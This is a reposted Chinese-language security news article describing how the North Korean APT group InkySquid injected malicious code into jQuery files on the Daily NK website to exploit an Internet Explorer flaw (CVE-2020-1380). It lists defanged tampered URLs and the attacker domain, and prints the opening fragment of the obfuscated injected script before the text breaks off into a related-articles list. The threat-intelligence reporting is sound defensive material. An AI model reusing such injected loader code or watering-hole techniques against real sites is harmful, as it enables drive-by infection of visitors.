当前位置: 首页 > news >正文

【安全漏洞】朝鲜InkySquid APT组织是怎么利用浏览器漏洞感染受害者

朝鲜InkySquid APT组织利用浏览器漏洞感染受害者。

2021年4月,Volexity研究人员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]services可疑代码。加载恶意代码的URL包括:

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

这些URL指向的是Daily NK网站使用的合法文件,但是内容被攻击者修改了,其中包含重定向用户从攻击者控制的域名jquery[.]services加载恶意JS。攻击者控制的代码只加入了很短的时间就被移除了,使得攻击者活动的识别变得非常困难。

CVE-2020-1380

Volexity研究人员发现攻击者利用的首个漏洞是CVE-2020-1380,一个IE 0 day漏洞利用。攻击者在Daily NK网站的下述合法文件中加入了一行代码:

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

加入到Daily NK网站的混淆的代码如下:

function vgrai(){var e=document.createElement("script"
http://www.xdnf.cn/news/832951.html

相关文章:

  • JDBC连接数据库的七个步骤(超详细)
  • CoInitialize错误引起的错误症状整理
  • 安卓的ContentResolver简介
  • 计算机的基本组成及其工作原理
  • Centos搭建socks5代理服务器
  • 【C++】TinyXML读取xml文件用法详解
  • 服务器中R及Rstudio-server的安装等
  • 0.96寸OLED显示屏模块
  • Python爬虫工程师是干什么的?能赚多少钱?需要掌握哪些技术?
  • 百度网盘linux版本怎么安装
  • Activity
  • 获取时间的几种方法
  • 软件详细设计说明书编制模板(直接套用模板2024Word原件)
  • 一步一图带你深入理解 Linux 物理内存管理
  • Windows系统报错msvcp100.dll丢失的多种解决方法分享
  • 异步FIFO设计详解
  • 【Xilinx Vivado时序分析/约束系列7】FPGA开发时序分析/约束-FPGA单沿采样数据input delay时序约束实操
  • 网络IP地址冲突故障,快速解决方案(非常详细)零基础入门到精通,收藏这一篇就够了_内网总提示有ip冲突
  • LDAP 是个啥你知道吗?
  • 面试常问-Alpha测试和Beta测试
  • 距离保护原理
  • TCP的核心系列 — SACK和DSACK的实现(一)
  • BigDecimal中divide方法与setScale方法详解
  • 详解a标签中href=javascript的几种用法
  • C语言scanf函数详解..
  • 【数据结构】树(四)—— 线索二叉树(C语言版)
  • 系统缺失GdiPlus.dll文件导致出现系统异常的解决办法
  • 影音先锋 android下载地址,影音先锋安卓版下载
  • leapftp怎么用,掌握leapftp的使用方法只需6步
  • MS17-010(永恒之蓝)漏洞分析与复现